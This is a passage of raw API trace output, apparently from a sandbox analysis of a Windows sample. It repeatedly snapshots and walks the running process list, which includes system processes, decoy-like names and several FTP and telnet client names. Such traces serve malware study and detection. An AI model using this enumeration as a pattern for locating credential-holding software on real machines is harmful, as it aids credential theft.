th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0185.300] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0185.303] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0185.361] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0185.363] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="society-position-myself.exe")) returned 1 [0185.366] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="heavy.exe")) returned 1 [0185.368] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mayvarious.exe")) returned 1 [0185.372] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0185.374] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xa1c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0185.377] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0185.379] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0185.381] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0185.384] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="9DC0.exe")) returned 1 [0185.386] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x778, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0185.389] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0185.392] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0185.394] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xdd8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0185.439] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0185.441] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0185.443] CloseHandle (hObject=0x17ec) returned 1 [0185.444] Sleep (dwMilliseconds=0x64) [0185.463] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17ec [0185.526] Process32First (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0185.530] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x71, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0185.533] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0185.535] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0185.537] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0185.597] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0185.599] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0185.601] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0185.602] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0185.604] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.605] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.607] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0185.608] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.610] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.611] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.613] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.614] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.616] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.617] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.619] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0185.620] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0185.622] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x33, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0185.623] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0185.625] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.626] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0185.628] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0185.631] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0185.633] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0185.681] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0185.683] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0185.685] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.688] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0185.690] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0185.692] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0185.694] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0185.697] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.699] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="onlawyerseek.exe")) returned 1 [0185.701] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact believe worker.exe")) returned 1 [0185.704] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="partner.exe")) returned 1 [0185.706] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whole.exe")) returned 1 [0185.708] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="nation-choose.exe")) returned 1 [0185.710] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="insteadrecent.exe")) returned 1 [0185.712] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="side-end-death.exe")) returned 1 [0185.715] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="young every moment.exe")) returned 1 [0185.761] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="somethingvictim.exe")) returned 1 [0185.784] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="director_glass_possible.exe")) returned 1 [0185.785] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accept.exe")) returned 1 [0185.787] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ability-where-operation.exe")) returned 1 [0185.789] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="condition.exe")) returned 1 [0185.790] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="executive_anything.exe")) returned 1 [0185.792] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="movement indeed best.exe")) returned 1 [0185.793] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="memberheavy.exe")) returned 1 [0185.794] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gardenpolitical.exe")) returned 1 [0185.796] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="program-him-cell.exe")) returned 1 [0185.798] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="long_sense.exe")) returned 1 [0185.799] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="agreeinterestingreceive.exe")) returned 1 [0185.801] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0185.802] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1068, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0185.804] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0185.806] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0185.809] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0185.810] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0185.812] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0185.817] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, 